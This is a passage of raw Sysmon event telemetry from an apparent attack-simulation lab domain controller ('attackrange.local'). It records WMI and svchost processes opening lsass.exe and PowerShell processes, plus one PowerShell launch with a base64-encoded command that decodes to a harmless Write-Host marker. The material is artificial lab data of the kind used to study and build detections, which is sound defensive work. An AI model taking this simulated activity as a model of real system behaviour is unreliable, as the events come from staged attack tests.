16:54:42.811{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242414Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.811{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242413Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.811{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-CEAA-00000000AD01}3944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242412Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.811{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-CEAA-00000000AD01}3944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242411Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.811{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 11241100x80000000000000002242410Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.811{05ADC7E1-6DD2-603E-D0AA-00000000AD01}7532C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_hcscdvbc.wiq.ps12021-03-02 16:54:42.811 10341000x80000000000000002242409Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.811{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6DD2-603E-D3AA-00000000AD01}15816C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002242408Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.795{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6DD2-603E-D2AA-00000000AD01}13920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002242407Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.795{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242406Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.795{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242405Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.795{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242404Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.795{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242403Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.795{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6DD2-603E-D2AA-00000000AD01}13920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002242402Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.795{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-D2AA-00000000AD01}13920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002242401Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.804{05ADC7E1-6DD2-603E-D2AA-00000000AD01}13920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /Encode VwByAGkAdABlAC0ASABvAHMAdAAgADYAMgBjAGUAOQA4ADcAZAAtADMAMgAyADUALQA0ADAAZQAwAC0AOAAyADkAMgAtADgAZQAxAGIANgBmAGUAYgBjADgAYwA2AA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 23542300x80000000000000002242400Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.795{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BEA77E4B3590055A3BA4E7BF90F7935,SHA256=B5588ECF9E0EA0ED85D8C00BA1B7C2A6A98DF1AC4C3E8B1BC3514E4690D6E31E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242399Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.775{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-D0AA-00000000AD01}7532C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242398Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.775{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-D1AA-00000000AD01}5496C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242397Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.775{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-D0AA-00000000AD01}7532C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242396Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.775{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-CFAA-00000000AD01}13372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242395Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.775{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-CEAA-00000000AD01}3944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242394Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.775{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-CDAA-00000000AD01}12876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242393Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.775{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-CCAA-00000000AD01}14264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242392Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.775{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242391Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242390Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 